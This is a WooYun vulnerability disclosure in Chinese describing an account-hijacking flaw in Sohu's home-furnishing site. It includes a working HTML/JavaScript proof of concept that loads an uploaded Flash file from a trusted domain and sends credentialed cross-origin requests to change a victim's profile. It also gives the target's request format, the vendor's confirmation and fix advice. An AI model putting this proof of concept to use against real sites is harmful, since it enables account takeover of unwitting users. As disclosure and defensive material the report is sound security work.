搜狐焦点旗下搜狐家居可劫持任意账号（flash劫持案例） | wooyun-2015-0116384

漏洞概要关注数(24) 关注此漏洞

缺陷编号：

wooyun-2015-0116384

漏洞标题：

搜狐焦点旗下搜狐家居可劫持任意账号（flash劫持案例）

漏洞详情

披露状态：

2015-05-26：细节已通知厂商并且等待厂商处理中
2015-05-31：厂商已经确认，细节仅向厂商公开
2015-06-10：细节向核心白帽子及相关领域专家公开
2015-06-20：细节向普通白帽子公开
2015-06-30：细节向实习白帽子公开
2015-07-15：细节向公众公开

简要描述：

摩擦摩擦，求不小厂商。

详细说明：

http://mp.sohu.com/web/personal/get //上传身份证处未过滤，且文件上传到了itc信任域下
查看源码得到flash链接：

http://sucimg.itc.cn/avatarimg/b9242b2cbe19450a9347accbc8dcc639_1432645407636

接下来构造POC进行操作，这里用修改资料证明：
（图中cookie已删除）

得到请求包为：

http://pinge.focus.cn/a/edituserinfo
uid=84102935&province=1011&city=1011001&nickname=Jearyhack&realname=&contact=&visible=0&gender=1&description=hack&company=&cases=&isdesigner=2

POC：

<html>
<head><title>csrftest</title>
<script>
function Connection(Sendtype,url,content,callback){
	if (window.XMLHttpRequest){
		var xmlhttp=new XMLHttpRequest();
	}
	else{
		var xmlhttp=new ActiveXObject("Microsoft.XMLHTTP");
	} 
	xmlhttp.onreadystatechange=function(){
		if(xmlhttp.readyState==4&&xmlhttp.status==200)
		{
			callback(xmlhttp.responseText);
		}
	}
	xmlhttp.open(Sendtype,url,true);
	xmlhttp.setRequestHeader("Content-Type","application/x-www-form-urlencoded");
    xmlhttp.withCredentials = "true";
	xmlhttp.send(content);
}
  
function sendToJavaScript(strData){
    var theDiv = document.getElementById("HijackedData");
    var content = document.createTextNode(strData);
    theDiv.appendChild(content);
    theDiv.innerHTML += '<br/>'
    var posturl = "http://pinge.focus.cn//a/edituserinfo ";
    var postdata= "uid=84102935&province=1011&city=1011001&nickname=Jearyhack&realname=&contact=&visible=0&gender=1&description=hack&company=&cases=&isdesigner=2"; 
      Connection("POST",posturl,postdata,function(callback){});
 
}
</script>
</head>
<body>
<div id=HijackedData></div>
<object id="myObject" width="100" height="100" allowscriptaccess="always" type="application/x-shockwave-flash" data="http://sucimg.itc.cn/avatarimg/b9242b2cbe19450a9347accbc8dcc639_1432645407636">
<param name="AllowScriptAccess" value="always">
<param name="flashvars" value="input=http://pinge.focus.cn/u/attention">
</object>
</body>
</html>

漏洞证明：

设计师挺多了，大部分设计师都有联系方式哦，可指定目标进行劫持

用flash跨域理论上是可以模拟出用户的任何操作的，即使是在某些有token的情况下

修复方案：

1.涉及用户操作的请勿在crossdomain里配置*
2.上传文件到信任域时验证文件内容

版权声明：转载请注明来源 jeary@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：10

确认时间：2015-05-31 00:09

厂商回复：

感谢支持。

WooYun.org

漏洞概要关注数(24) 关注此漏洞

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 jeary@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 jeary@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞